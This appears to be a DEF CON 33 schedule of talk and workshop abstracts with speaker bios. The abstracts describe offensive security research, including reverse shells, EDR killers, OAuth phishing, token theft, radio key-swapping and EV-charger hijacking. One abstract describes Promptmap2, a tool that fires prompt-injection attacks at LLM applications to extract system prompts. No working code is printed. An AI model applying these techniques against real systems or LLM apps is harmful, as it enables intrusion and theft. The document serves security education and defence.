We'll reveal how the attack began months earlier than initially believed, with the attacker compromising multiple open-source projects and utilizing them for lateral movement. We'll detail how the adversary maintained a low profile, patiently waiting to spear-target Coinbase. We will dissect the sophisticated evasion techniques employed and the attacker's modus operandi, showing how the open-source access and trust model were weaponized to deliver a precise and calculated supply chain attack.
SpeakerBio: Aviad Hahami
Security researcher and experienced software engineer with a great passion for algorithms (graph theory specifically), security research (vulnerability research, bug bounties), chaos engineering (YES!), frontends, backends, web services, systems architecture, infras, clouds (making them rain), and more :) Today, researching at Palo Alto Networks. Oh yeah, I also DJ.
Apple Find My is a crowdsourced offline tracking network designed to assist in recovering lost devices while maintaining privacy. By leveraging over a billion active Apple devices, it has become the world's largest device-locating network. While prior research has demonstrated the possibility of creating DIY trackers that attach to the Find My network, they are mainly for personal use and do not pose a threat of remote attacks. Recently, we found an implementation error in the Find My network that makes it vulnerable to brute-force and rainbow table attacks. At a cost of a few US dollars, the exploit turns computers into trackers without requiring root privileges. We are concerned that adversaries and intelligence agencies would find this exploit handy for user profiling, surveillance, and stalking. This demo is especially appealing to those interested in the Find My network and Bluetooth tracking technologies. We will review how Find My offline finding works, elaborate on our discoveries in detail, describe techniques for making practical attacks, and provide source code for fun.
Speakers: Junming "Chapoly1305" Chen, Qiang Zeng
SpeakerBio: Junming "Chapoly1305" Chen
Junming is a PhD student at George Mason University. He works on IoT security and was previously a full-time security engineer in the electric automotive industry. He has a CompTIA Security+ certificate like everybody. He supports the Rizin Reverse Engineering Framework. This will be his first time presenting at DEF CON.
SpeakerBio: Qiang Zeng
Qiang received his bachelor's and master's degrees from Beihang University and his PhD degree from Penn State University. He is an associate professor in the Department of Computer Science at George Mason University. He is the recipient of an NSF CAREER Award. His main research interest is computer systems security, with a focus on cyber-physical systems, Internet of Things, and mobile computing. He also works on adversarial machine learning.
Nuclei has become a game-changing tool for hackers worldwide, transforming how we discover vulnerabilities and hack at scale. This workshop explores why Nuclei is dominating the bug bounty scene and how it's evolving the art of automated hacking. We'll dive into how this open-source powerhouse lets hackers scan thousands of targets, write custom templates, and find bugs that automated scanners miss.
SpeakerBio: Ben "nahamsec" Sadeghipour, Co-Founder & CEO at HackingHub
Ben Sadeghipour, better known as NahamSec, is an ethical hacker, content creator, and keynote speaker. Over his career, Ben has uncovered thousands of security vulnerabilities for major organizations, including Amazon, Apple, Zoom, Meta, Google, and the U.S. Department of Defense. As a top-ranked bug bounty hunter, he is deeply passionate about cybersecurity education, regularly sharing his knowledge through his popular YouTube channel and speaking at major conferences like DEF CON and BSides. Beyond his personal achievements, Ben is committed to building the security community, organizing events that foster collaboration, innovation, and the next generation of offensive security professionals.
OAuthSeeker is a cutting-edge red team tool designed to simulate OAuth phishing attacks, specifically targeting Microsoft Azure and Office365 users. This tool facilitates the creation, management, and execution of phishing campaigns without requiring advanced technical skills. By leveraging malicious OAuth applications, OAuthSeeker allows offensive security engineers to perform targeted phishing attacks to compromise user identities and gain access to Microsoft Graph API and Azure resources. With features like an administrative control panel, token refresh capabilities, and customizable skins for user-facing components, OAuthSeeker provides an effective solution for testing security defenses against a common but often overlooked attack vector. The tool is easy to deploy as a single pre-compiled Go binary with zero external dependencies and includes built-in support for LetsEncrypt. The documentation is highly detailed and outlines all the possible attack paths where this capability could be used during real-world red team engagements. The installation process is streamlined, requiring only a single command to deploy a new instance of the application.
SpeakerBio: Adam "UNC1739" Crosser, Staff Security Engineer at Praetorian
Adam Crosser is a Staff Security Engineer at Praetorian, specializing in offensive security research and tooling development. He began his career in red team operations, honing his skills in adversary simulation and advanced attack techniques. Now part of the Praetorian Labs team, Adam focuses on vulnerability research, exploit development, and building custom offensive security capabilities to support red team engagements—pushing the boundaries of adversary tradecraft.
Accesses to the blockchain's state and logs leak highly sensitive information such as the user's identity, who they are trading with, and which crypto-asset the user is interested in trading. In this tutorial, we will go over two technologies for ensuring access-pattern privacy: Oblivious RAM (ORAM) and Private Information Retrieval (PIR). Unlike traditional encrypted databases that protect only the contents of data, these technologies additionally protect the queries, thus hiding users' intentions. We will describe two extremely simple constructions, one ORAM and one PIR scheme. In particular, the ORAM algorithm is also the one used by industry leaders such as Signal and Meta. We will next show a demo of our oblivious key-value store implementation. We will also challenge the learners with a CTF problem that demonstrates how sensitive secrets can easily be leaked even when the memory contents are encrypted.
Speakers: Elaine Shi, Afonso Tinoco
SpeakerBio: Elaine Shi
Elaine Shi is a Packard Fellow, Sloan Fellow, ACM Fellow, and IACR Fellow. A Professor with a joint appointment in CSD and ECE at Carnegie Mellon University, Elaine is also an Adjunct Professor of Computer Science at the University of Maryland. Her research interests include cryptography, security, mechanism design, algorithms, foundations of blockchains, and programming languages. Elaine is a co-founder of Oblivious Labs, Inc. Her research on Oblivious RAM and differentially private algorithms has been adopted by Signal, Meta, and Google.
SpeakerBio: Afonso Tinoco
Afonso Tinoco is a PhD candidate currently on leave from Carnegie Mellon University and the University of Lisbon. His research interests include Applied Cryptography and Distributed System Verification. He is a Co-Founder and a Research Engineer at Oblivious Labs, Inc. (https://obliviouslabs.com). Oblivious Labs' mission is to develop open-source toolchains for Oblivious Computation (https://github.com/obliviouslabs/), with the goal of accelerating the wide deployment of Oblivious Computations. He is also a co-captain of STT (https://sectt.github.io/), the CTF team of the University of Lisbon.
For years, the Pentestmonkey Reverse Shell Cheat Sheet defined the essentials of post-exploitation. Bash, Python, PHP, (G)Awk, Netcat and others were quick, simple and highly effective tools for gaining shell access. Today, those tools are the first to be flagged, restricted or removed. In real-world hardened environments, the old paths are closed. Meanwhile, new runtimes like Clojure, Racket, NATS-IO, Bun, Crystal, Red Language, Ballerina and others are becoming part of production environments, CI/CD pipelines and internal developer ecosystems, usually without security teams treating them as risks.
This workshop focuses on building practical, working reverse and bind shells using these modern runtimes. Participants will write their own payloads, test them live against targets and leave with working knowledge of how to survive without traditional tooling. Every shell demonstrated will be integrated into the Metasploit Framework with custom modules built for each runtime. Source code, victim and attacker virtual machines and pre-built environments will be provided to ensure every participant can practice during the session.
This is not a theory-heavy workshop. It is about operational survival when Python is gone, Netcat is restricted and standard shells are no longer viable. It is about turning runtimes that defenders ignore into reliable offensive footholds. Attendees will leave with ready-to-use payloads, working Metasploit extensions, and the technical knowledge to adapt to modern detection-heavy environments.
SpeakerBio: Roberto Soares
With more than 10 years immersed in Information Security, he is an Information Security Engineer specializing in Red Team. His focus extends to best practices, encompassing application and infrastructure vulnerability assessments, code reviews, and a mix of static and dynamic analyses to identify vulnerabilities. In addition to his main focus, he has a strong inclination to develop offensive tools. He has contributed more than 25 modules to the core Metasploit framework and registered several CVEs. Additionally, his knowledge covers the complex landscape of macOS security. His curiosity leads him to test non-trivial scenarios, from analyzing cranes that operate containers on ships, to delving into the complexities of embedded systems (SCADA/PLC) and executing advanced attacks on computer networks; that is, his hacker spirit runs through his veins. He really enjoys breaking and fixing things that contain bits and bytes.
Encrypted radios promise off-grid privacy and security, but what if their core trust anchors can be broken with one message? Our latest research shows that a single, unauthenticated RF packet can overwrite any public keys goTenna Pro stores for peer-to-peer and group chats, silently substituting attacker-controlled keys so that every AES-256 encrypted message is now readable only to the attacker, not the intended recipient; by repeating the swap on both ends the attacker becomes an undetectable man-in-the-middle who alone can forward, alter, or drop traffic, leaving victims blind to the compromise. We will live-demo three outcomes: pulling teams into GPS dead zones by injecting phantom coordinates; impersonating a surveillance teammate to feed disinformation and fracture cohesion; and detonating a network-wide blackout that forces operators onto weaker radio communication that allows easy direction-finding. The audience will watch us craft the packet, poison key stores, pivot between victims, and restore normalcy - all from commodity SDR hardware and open-source code released at the session. We close with hardening guidance and the patch in goTenna Pro version 2.0.3 (CVE-2024-47130), proving once again that cryptography is only as strong as the key lifecycle surrounding it.
Speakers: Erwin "Dollarhyde" Karincic, Woody
SpeakerBio: Erwin "Dollarhyde" Karincic
Erwin is an experienced security researcher specializing in both hardware and software reverse engineering, binary analysis, and exploit development across a range of processor architectures. He has notable experience in implementing complex Radio Frequency (RF) waveforms using Software Defined Radios (SDRs) for cybersecurity applications, complemented by his proficiency in designing, simulating, and fabricating antennas tailored for such applications. His past work includes extensive TCP/IP networking experience, designing worldwide secure communication systems. Erwin holds a number of prestigious certifications, including OSCP, OSCE, OSWE, OSEE, and CCIE Enterprise Infrastructure. Erwin is also a staff member in the RF Hacker Sanctuary and a member of Security Tribe.
SpeakerBio: Woody
Woody thinks Linux is a member of the Charlie Brown gang who can lift heavy things but not always spell them. He has had some success with RF exploits in the past with the first ever goTenna exploit talk in the RF wireless village as well as the first attack against Ford Raptor key fobs with the RaptorCaptor exploit. Woody's unique background, familiar to some, gives him a creative perspective on the impact of goTenna Pro research in the physical and RF world. Woody is also a staff member in the RF Hacker Sanctuary, a member of Security Tribe, and has appeared on a few episodes of Hak5 describing novel device attacks.
In this talk, we present a collection of attacks against the most widely used EV charging protocol by exploiting flaws in the underlying power-line communication technologies affecting almost all EVs and chargers.
Specifically, we target the QCA 7000 Homeplug modem series, used by the two most popular EV charging systems, CCS and NACS.
We demonstrate multiple new vulnerabilities in the modems, enabling persistent denial of service.
To better understand the scope of these issues, we conduct a study of EV chargers and vehicles, and show widespread insecurities in existing deployments.
We show a variety of practical real-world scenarios where the HomePlug link can be used to hijack EV charging communications, even at a distance.
Finally, we present results from reverse engineering the firmware and how we can gain code execution.
Speakers: Marcell Szakály, Sebastian Köhler, Jan "SP3ZN45" Berens
SpeakerBio: Marcell Szakály
Marcell Szakály is a PhD student in the Systems Security Lab at the University of Oxford. His research focuses on the security of the EV charging infrastructure. He received his master's degree in Physics and worked on superconducting magnet design. His work now involves RF hardware, SDRs, and digital electronics.
SpeakerBio: Sebastian Köhler
Previous speaker at CarHackingVillage 2023: Redeploying the Same Vulnerabilities: Exploiting Wireless Side-Channels in Electric Vehicle Charging Protocols.
SpeakerBio: Jan "SP3ZN45" Berens
Jan Berens, aka SP3ZN45, has been a goon in the QM department for several years now and is working full time as a red teamer at alpitronic SLR, the leading manufacturer of DC chargers in Europe. His background is security consulting and penetration testing for critical infrastructures and industrial installations in Europe. He does mostly non-publicly-disclosed security research and mentors beginners in the security domain.
A cross-border health emergency is spreading fast and you’re on the front lines of the response. Hospitals are overwhelmed. ICU beds are full. Strange symptoms are emerging in a tight geographic cluster across southern Germany and eastern France. Supply chains are buckling, communications are failing, and trust in public health institutions is unraveling. At the Biohacking Village during DEF CON 33, Operation Europa Crisis invites you to join a gripping, real-time tabletop challenge.
🧠 Step Into the Crisis
Take on roles such as hospital administrators, health ministry officials, crisis communication leads, frontline clinical staff, supply chain and logistics coordinators, and the CBRN and incident response team. Together, you'll investigate the cause, coordinate international response efforts, manage conflicting narratives, and navigate critical decisions in a high-pressure environment.
SpeakerBio: Nathan Case, CSO at Clarity
Nathan Case is a cybersecurity engineer and executive with over two decades of experience designing, securing, and scaling complex systems across public and private sectors. He currently serves as the Vice President of Cloud Computing and Cyber Solutions at Clarity, leading efforts at the intersection of secure cloud architecture, AI engineering, and national defense. In this role, he provides technical direction, manages multidisciplinary teams, and collaborates closely with government stakeholders to deliver operationally effective solutions that meet mission-critical needs.
We’re trying to debug the end of the world through trial and error — mostly error. In the middle of a worsening climate crisis, outdated OT protocols like Modbus are being exploited by state-sponsored actors in ways that turn environmental infrastructure into geopolitical weapons. From hijacked dams running Windows 95-era code to smart thermostats recruited into botnets fighting over Arctic oil, the climate-tech battlefield is already here.
This session dives into how APTs are quietly compromising the systems designed to save the planet. We’ll examine real-world campaigns where threat actors have targeted energy grids, carbon capture labs, and EV infrastructure — and how climate action is being derailed by 1970s-era code and modern apathy.
This is Cyber Threat Intelligence meets Climate Fiction (Cli-Fi). It’s weird, terrifying, and very real.
SpeakerBio: Cybelle Oliveira, Cyber Threat Intelligence Researcher at Malwarelandia
Cybelle Oliveira is a Cyber Threat Intelligence researcher and a Master’s student in Cyber Intelligence. She teaches in a postgraduate CTI specialization program in Brazil and is the co-founder of La Villa Hacker — the first DEF CON village dedicated to the Portuguese and Spanish-speaking community. Cybelle has spoken at some of the world’s leading security conferences, including DEF CON, BSides Las Vegas/São Paulo/Rio de Janeiro, 8.8 Chile, Cryptorave, Radical Networks, Mozilla Festival, and many others. Her work often explores the intersection of cyber threats, geopolitics, and underreported regions, with a particular interest in the strange, obscure, and catastrophically messy corners of cybersecurity.
While the theft of Primary Refresh Token (PRT) cookies on Windows has been extensively studied, similar attacks on macOS remain unexplored. As organizations increasingly use Microsoft Intune to manage both Windows and macOS devices, a critical question arises: can attackers also extract PRT cookies from macOS?
In this talk, we present our research into Microsoft’s SSO implementation within the Intune Company Portal for macOS. We compare authentication flows and security controls between Windows and macOS, exposing weaknesses that allow attackers to bypass process validation and obtain authentication tokens under certain conditions.
Another obstacle for attackers has been Microsoft’s efforts to make it more difficult to register new devices using stolen credentials for persistence. Our research introduces a novel technique: once an attacker acquires a token with an MFA claim on the device, they can still register new devices and generate new tokens without concern for the original stolen token’s expiration.
We will demonstrate PRT Cookie extraction on macOS and release a proof-of-concept tool, showing not only how credential theft techniques can now extend beyond Windows to macOS environments, but also how attackers can leverage these techniques for long-term persistence.
Shang-De Jiang is a deputy director of the research team at CyCraft. He currently focuses on research into Incident Response, Endpoint Security, and Microsoft Security. He has given technical presentations at non-academic conferences such as TROOPERS, HITB, HITCON, CodeBlue, Blue Team Summit and Black Hat USA. He is the co-founder of UCCU Hacker, a private hacker group in Taiwan.
SpeakerBio: Dong-Yi "Kazma Ye" Ye
Kazma is a university student from Taiwan and a cybersecurity intern at CyCraft. His current work focuses on how Microsoft Entra ID integrates and behaves on macOS, diving deep into binary internals and real-world authentication logic. He’s also a CTF player with the B33F 50UP team, with a passion for reverse engineering and binary exploitation.
SpeakerBio: Tung-Lin "Echo Lee" Lee
Echo is a cybersecurity researcher at CyCraft Technology, specializing in network and cloud security. He has presented at industry conferences, including DEVCORECONF, HITCON ENT, ROOTCON, InfoSec Taiwan, and CyberSec.
This presentation will provide ICS security practitioners with a comprehensive introduction to Operational Technology (OT) network segmentation. As industrial control systems face increasing cyber threats, proper network segmentation has become a critical security control to limit attack surfaces and protect critical infrastructure.
Attendees will learn practical approaches to planning segmentation architectures, implementing controls across OT environments, and validating the effectiveness of their segmentation strategy.
The session blends theoretical concepts with practical implementation guidance suitable for security practitioners with introductory to intermediate knowledge of industrial control systems.
Key topics include: OT Network Segmentation Fundamentals (objectives, benefits, IT/OT differences, reference architectures); Planning Strategies (asset inventory, flow analysis, zone design, risk-based requirements, legacy systems); Implementation Approaches (physical vs. logical separation, DMZs, deep packet inspection, data diodes, appropriate tools); Validation Methods (verification techniques, safe penetration testing, monitoring, measuring success); and Real-World Case Studies with lessons learned and common challenges.
This session is designed for industrial cybersecurity professionals, control system engineers, IT/OT security architects, and other stakeholders responsible for securing operational technology environments. Attendees should have basic familiarity with industrial control systems and networking concepts.
SpeakerBio: Tony Turner, Frenos
Tony is a seasoned security architect with over 25 years of experience spanning both IT and OT cybersecurity domains. As VP of Product at Frenos, he leads an AI-driven platform that automates security assessments for operational technology environments.
His diverse background includes critical infrastructure protection at a major US airport, incident command for state government public health systems, engineering disaster recovery operations for hurricane response, and security implementations for global semiconductor and integrated circuit manufacturing facilities.
Tony has developed specialized expertise in vulnerability management, security hardening, application security, secure network infrastructure, supply chain risk management, and Cyber Informed Engineering (CIE). He authored "Software Transparency" and developed the SANS SEC547 course "Defending Product Supply Chains."
As OWASP Orlando chapter lead and Chief Editor for cyberinformedengineering.com, Tony actively promotes security best practices within the industrial community. He also leads defendics.org, a nonprofit focused on advancing Cybersecurity Performance Goals (CPG) and foundational OT security practices for resource-constrained asset owners.
Local Administrator Password Solution (LAPS) automates local admin password rotation and secure storage in Active Directory (AD) or Microsoft Entra ID. It ensures that each system has a unique and strong password.
In OverLAPS: Overriding LAPS Logic, we will revisit and extend our previous research (Malicious use of "Local Administrator Password Solution", Hack.lu 2017) by exposing client-side attacks in Windows LAPS ("LAPSv2"). After a brief overview of LAPS's evolution, from clear-text fields in AD with Microsoft LAPS ("LAPSv1") to encrypted AD attributes or Entra ID storage with Windows LAPS, we will explore the client-side logic of Windows LAPS. Unlike prior work that exfiltrates passwords only after directory compromise, we will focus on abusing LAPS to maintain presence on compromised endpoints, both on-prem and Entra-joined devices.
We will leverage PDB symbols and light static analysis to understand how LAPS works internally, then use Frida for dynamic hooking to capture, manipulate, and rotate admin passwords on demand. We will also reproduce Frida proof-of-concepts using Microsoft Detours for in-process hooks.
Attendees will gain practical insights into new attack vectors against Windows LAPS, enabling them to assess, reproduce, and defend against client-side attacks in their own environments.
Antoine Goichot is a French cybersecurity professional and Ethical Hacker working in Luxembourg. With ten years of hands-on experience and some certifications (CRTO/CRTL, GPEN/GXPN, GDAT), he has been into hacking since junior high school. He was always trying to find clever ways to solve technical problems and tweak his computer. In high school, he jailbroke a dozen PSPs so friends could play homebrew games between classes. He later studied computer science and networks at TELECOM Nancy. Now a Senior Manager at PwC Luxembourg, Antoine leads projects for a large variety of clients including major corporations, banks, European institutions, and insurance companies. Beyond his day job, he has uncovered several vulnerabilities in Windows VPN clients, Cisco AnyConnect (CVE-2020-3433/3434/3435, CVE-2020-27123, CVE-2021-1427) and Ivanti Secure Access (CVE-2023-38042). These issues have been fixed by the vendors after coordinated disclosure. Antoine has contributed to the cybersecurity community through a conference paper co-authored during his studies, blog posts, articles in MISC magazine (a French periodical), etc. He also co-presented at Hack.lu in October 2017 on "Malicious use of 'Local Administrator Password Solution'".
This project is an open source hardware powered air-purifying respirator designed for use as personal protective equipment, offering N100-level filtration against airborne threats including pathogens and particulates, developed by Tetra Bio Distributed. We will demo the PAPR and discuss how to hack together your own using 3D-printed and off-the-shelf components, source one yourself, or contribute to the project.
Speakers: Sean Marquez, Melanie "Goldfishlaser" Allen
Sean has a B.S. degree in mechanical engineering, specializing in design of mechanical systems, from the University of Irvine, California. He is currently studying permaculture design. He worked as an associate mechanical design engineer for Max Q Systems, formerly an original equipment manufacturer for the aerospace industry. He served as the GreenHab officer at the Mars Desert Research Station. He is also a contributor to the Open Source Hardware Association open standards working group, Tetra Bio Distributed developing open-source hardware medical and PPE devices, and the Mach 30 Foundation developing the distributed open-source hardware framework.
SpeakerBio: Melanie "Goldfishlaser" Allen
Melanie is a technical writer and open hardware developer. At DEF CON 32, she presented the Open Hardware Design for BusKill Cord demo lab, inviting participation in the 3D-printed dead man's switch project. She continues to contribute to open hardware and software initiatives that promote digital security and public accessibility. Learn more at mnallen.net.
When vulnerabilities are disclosed, security teams face the task of developing exploits to identify compromised assets. Public exploits aren’t always available, which is why teams scroll through hundreds of patches to identify the relevant one. Traditional methods like grepping might speed up the process, but they mostly prove ineffective against modern codebases where context-aware analysis is required. We present PatchLeaks, a tool that transforms the messy patch analysis process into efficient vulnerability discovery. Unlike regex-based static analysis tools, it locates relevant patches with vulnerable code based on the CVE id only, doesn’t require any rules, is able to identify logical vulnerabilities, and analyzes even corrupt files.
SpeakerBio: Huseyn "Khatai" Gadashov
Huseyn is a web application security specialist whose experience includes security roles at multiple financial institutions where he conducted web penetration testing, vulnerability assessments, and developed exploit automation tools. In his free time, he analyzes security patches to craft private exploits and uses them in his technical publications. Using his offensive security experience, he explores how machine learning can revolutionize the identification of hidden vulnerabilities within security patches.
This workshop will teach how to start pen testing a cloud REST API. Attendees should have a fundamental knowledge of the OWASP Top 10 and web application security. Attendees will learn how to set up tools (e.g. Burp) and practice on a simulated cloud environment to discover vulnerabilities in cloud REST APIs. This includes attacks on authorization, XSS, and SQL injection. Technologies such as OpenStack, Salesforce, and Google Cloud will be covered.
SpeakerBio: Rodney Beede, Principal Consultant at Coalfire
Rodney is a principal consultant and has specialized in cloud security for over 10 years. He has spoken at multiple conferences on topics from cloud security engineering to IoT device hacking. He has multiple CVEs for discovered web application security vulnerabilities. He started his career in enterprise web application software development but shifted to the security industry with his 2012 master's thesis research project "A Framework for Benevolent Computer Worms". Website: https://www.rodneybeede.com
In this talk you get an insight into real-world Red Team operations conducted onboard ships and against maritime companies. Drawing from first-hand experience, the presentation walks through how Red Teamers boarded cruise ships undercover as regular passengers and proceeded to gain deep access to both IT systems and critical operational areas. The talk reveals how testers were able to physically enter restricted zones such as communication rooms and engine control rooms, all while blending in with guests and crew. It will also showcase how vulnerabilities in shipboard infrastructure allowed the team to manipulate or disable key systems, including navigation and onboard communications, on both passenger and cargo vessels. Whether you’re in cybersecurity, maritime operations, or just curious about how to hack a ship, this is a talk you don’t want to miss.
SpeakerBio: John Andre Bjørkhaug, Netsecurity
John-André Bjørkhaug has worked as a penetration tester for over 16 years. He has a degree in electrical engineering but prefers to break things instead of building things. This led him to become a hacker/penetration tester. John's main focus is penetration testing of internal infrastructure and physical security systems, together with social engineering and full-scale Red Team tests.
Hey there hackers! I am a Lead Triager at HackerOne based in Denver. I started my security journey by sending out download links to trojans to unsuspecting users on ICQ. Years later I began poking around internal systems at the companies I worked at. This led to a deeper interest in how easily users can be compromised. Shortly after I went all in on learning all things appsec related. Today I get to see, recreate, assess, and triage your bug bounty reports which range from open redirects to PII disclosure of thousands of customers to novel LLM hacks. I've triaged over 10,000 reports. My advice is to validate your input! Feel free to reach out over LinkedIn.
SpeakerBio: Michael "codingo_" Skelton, Bugcrowd
Inti De Ceukelaire is a Belgian ethical hacker and cybercrime investigator. He currently works as the Chief Hacker Officer at Europe's largest vulnerability disclosure platform Intigriti, a founding member of the Hacker Policy Council. In 2018, Inti won the "Most Valuable Hacker" award at the largest live hacking event in Las Vegas.
With extensive experience in the field of security and ethical hacking, Inti has earned a reputation as a thought leader in the industry. His work and expertise have been featured in a variety of international publications, including the BBC, Wired, The Verge, CNET, Mashable, and New York Magazine. Inti has made global headlines through his security awareness pranks, which have included manipulating the Vatican's website, creating fake news on Donald Trump's Twitter account, and hacking Metallica. Through these high-profile stunts, Inti has drawn attention to the importance of cybersecurity and the need for individuals and organisations to be vigilant about potential threats. As an experienced and engaging speaker, Inti is able to make complex topics accessible to a wide audience. He has spoken at a variety of conferences and events, sharing insights on the latest trends in cybersecurity and offering practical tips to help individuals and organisations protect themselves from potential threats.
He is also a trusted source for media outlets seeking expert commentary on topics related to cybersecurity, hacking and technology.
SpeakerBio: Eddie Rios, Synack
Born and raised in TX, been hacking or breaking things since I was a kid. Got my start in phreaking because computers were too expensive back then! Been working in the Information Security field since 2013 and have been working for Synack since 2016. I've seen over 15k reports in that time and have been pretty active with researchers from all over the world. Before security I worked as a technician for various companies including Geek Squad. Before my time in IT I did body piercings or worked in various fields including retail and fast food. All of which helped me understand the importance of helping people to the best of my abilities.
SpeakerBio: Anthony Silva, Customer Success Manager at YesWeHack
Anthony Silva is a Customer Success Manager at YesWeHack, where he manages a diverse portfolio of clients -- from startups to international enterprises -- across multiple industries and countries.
He supports organizations in designing, launching, and optimizing their bug bounty, vulnerability disclosure (VDP), and pentest programs, guiding them from initial onboarding through the full lifecycle of their engagements.
Anthony works closely with cross-functional teams, including sales, product, technical experts, triage analysts, and the hacker community, to ensure customer satisfaction and program effectiveness.
Before joining YesWeHack, he gained valuable experience in various technology and consulting companies, where he developed a strong foundation in cybersecurity, project management, and client relations. As an active registered hunter on several platforms, he also brings hands-on insight into offensive security practices.
Based in Paris and originally from Toulouse, Anthony has French, Spanish, and Portuguese roots. He is passionate about technology, geopolitics, science, and video games.
SpeakerBio: Jasmin "JR0ch17" Landry
Jasmin Landry is a seasoned ethical hacker and full-time bug bounty hunter who has reported hundreds of security vulnerabilities to some of the world’s largest tech companies. After years leading cybersecurity efforts as Senior Director of Information Security at Nasdaq, Jasmin returned to his roots in hacking — now focusing exclusively on uncovering critical bugs through bug bounty platforms. Recognized at multiple live hacking events for top findings, he brings a sharp eye for unexpected issues and a deep understanding of modern attack surfaces. He’s also a co-leader of OWASP Montréal and an active voice in the security research community.
Quantum computers will crack RSA and ECC and weaken symmetric encryption, but when? NIST is betting it won't happen before 2035, setting that deadline for companies to migrate to post-quantum cryptography (PQC). However, recent developments make it clear that we might not have 10 years; we might have only 5! Join Konstantinos Karagiannis (KonstantHacker) as he breaks down the latest algorithmic estimates, including Oded Regev's game-changing tweak to Shor's algorithm, which promises faster factoring with fewer qubits. He also discusses IonQ and IBM's aggressive roadmaps, pushing us closer to cryptographically relevant quantum computers (CRQCs). Think 1000+ qubits by 2026 and fault-tolerant systems by 2030. And when Q-Day does arrive, will we be able to catch or prevent bad actors from running these algorithms on cloud quantum platforms? Learn what's possible when monitoring quantum circuit patterns and suspicious API calls.
SpeakerBio: Konstantinos Karagiannis, Director of Quantum Computing Services at Protiviti
Forged in the InfoSec trenches of the 90s and a pioneer in the quantum computing space since 2012, Konstantinos Karagiannis (KonstantHacker) lives at the intersection of cryptography and physics. As Protiviti's Director of Quantum Computing Services, he translates the existential threat—and promise—of quantum for the world's top organizations. When he's not behind the mic on The Post-Quantum World podcast, you can find him on stage at RSA, Black Hat, and right here at DEF CON, where he reigns as a Venerable Village Elder of the Quantum Village.
Threat actors skillfully evade automated defenses. Countering them requires more than tools; it demands human insight and the art of precise detection. In Practical YARA: Crafting Custom Rules for Targeted Malware Defense, you'll move beyond generic signatures and learn the craft of building truly effective YARA rules. This workshop focuses on translating the nuanced understanding gained from malware analysis and threat intelligence into powerful, human-authored detections. Through fast-paced, hands-on labs covering static and behavioral analysis, you will master the art of identifying unique malicious characteristics and expressing them efficiently in YARA. Learn to build high-fidelity rules that supercharge threat hunting, pinpoint emerging threats, and give you confident control—skills essential in an era where quality hand-crafted detection logic provides a critical edge. Leave ready to bolster your defensive arsenal with expertise, not just automation.
Speakers: Joshua "jstrosch" Stroschein, Francisco Perdomo, Jae Young Kim
Joshua is an experienced malware analyst and reverse engineer and has a passion for sharing his knowledge with others. He is a reverse engineer with the FLARE team at Google, where he focuses on tackling the latest threats. He is an accomplished trainer, providing training at places such as Ring Zero, Black Hat, DEF CON, ToorCon, Hack In The Box, SuriCon, and other public and private venues. He is also an author on Pluralsight, where he publishes content around malware analysis, reverse engineering, and other security related topics.
SpeakerBio: Francisco Perdomo, Google
Francisco is a skilled security professional with a strong background in detection engineering and threat intelligence. With extensive blue team experience, he currently works as a Security Engineer on Google's VirusTotal Research team, where he leverages his operational expertise to investigate malware trends and create insightful technical content. Francisco's background includes roles as a SecOps Engineer and Professor of Computer Security.
SpeakerBio: Jae Young Kim, Google
Jae Young Kim is a Senior Reverse Engineer on Mandiant's FLARE Team, where he reverses malware and contributes to FLARE's automated analysis and binary similarity efforts. He is a seasoned instructor and a core contributor to FLARE’s educational content development efforts. He has a Bachelor's in Computer Science from Columbia University.
This workshop will focus on our public and private lives, as well as things one might want to keep secret. If all of your data is public, then anyone can access everything everywhere. While access everywhere is the theme of DC 33, we will focus on shutting down access to your data. Being private can help set you free. We will go over both OSINT techniques to see what an individual’s footprint is and then also go over obfuscation techniques to lessen that footprint. Attendees of this workshop should bring their device and be ready to work on becoming more private.
SpeakerBio: Meghan Jacquot
Promptmap2 is a vulnerability scanning tool that automatically tests prompt injection attacks on your custom LLM applications. It analyzes your LLM system prompts, runs them, and sends attack prompts to them. By checking the response, it can determine if the prompt injection was successful or not. It has ready-to-use rules to steal system prompts or distract the LLM application from its main purpose.
SpeakerBio: Utku Sen
Utku is a security researcher known for creating open-source security tools including promptmap, urlhunter, and wholeaked. He has presented his various research and tools many times at DEF CON and Black Hat conferences. He was also nominated for the Pwnie Awards in the Best Backdoor category in 2016. He works for Bank of America as a senior security professional.
Many cybercrime and APT actors kill and/or silence EDR agents in order to evade detection, allowing them to achieve their actions on objectives without notifying security teams. How do they do it? What tools do they use? How do they write those tools? What is BYOVD? If you’re interested in learning how adversaries bypass EDR platforms, this workshop is for YOU!
Every student who attends this workshop will have a personal lab environment generated for them. Using the online lab environment, students will review a live EDR tool in order to become familiar with its capabilities, logging, and more. Students will then compile and run an EDR killer used commonly by major threat groups. Next, students will execute commands to silence agent-to-tenant communication, thereby negating notification to security teams.
Following the building, use, and analysis of readily-available tools, students will learn how to write their own code to achieve similar means. We will be using a combination of pre-provided code snippets and code we write in real-time in order to both kill and silence the provided EDR agent. Are you ready to take your reverse engineering and coding skills to the next levels? – Let’s do this! And remember: #RansomwareSucks!
Speakers: Ryan "rj_chap" Chapman, Aaron "ironcat" Rosenmund
Ryan Chapman is the author of SANS’ “FOR528: Ransomware and Cyber Extortion” course, teaches SANS’ “FOR610: Reverse Engineering Malware” course, works as a threat hunter @ $dayJob, and is an author for Pluralsight. Ryan has a passion for life-long learning, loves to teach people about ransomware-related attacks, and enjoys pulling apart malware. He has presented workshops at DefCon and other conferences in the past and knows how to create a step-by-step instruction set to maximize hands-on learning.
SpeakerBio: Aaron "ironcat" Rosenmund, Managing Director of Tradecraft and Programs at OnDefend
Aaron Rosenmund is an accomplished cybersecurity professional with extensive experience in various leadership roles across multiple organizations. Currently serving as the Managing Director of Tradecraft and Programs at OnDefend since September 2024, Aaron also holds a position at the National Guard Bureau as Staff Lead for the Cyber Shield Red Team, demonstrating a commitment to enhancing cybersecurity defenses. With a background that includes significant roles at Pluralsight, where responsibilities spanned content strategy and security skills development, and the Florida Air National Guard as a Lead Cyber Operator focused on defensive operations, Aaron has developed a comprehensive skill set in threat emulation, cyber system operations, and training. Additionally, past leadership positions as CEO at Aestus Industries and Vice President at Concrete Surface Innovations underscore strong management capabilities and operational expertise. Aaron holds multiple degrees in technology and cybersecurity from respected institutions, underscoring a solid educational foundation in this field.
Come meet the largest social network of LGBTQIA+ and allied hackers at Queercon! Our mixers are designed for you to meet, network, and engage with like-minded people to a backdrop of music, dance, and refreshments.
Can You Really Trust Your EDR? Spoiler: Attackers Don’t — They Exploit It.
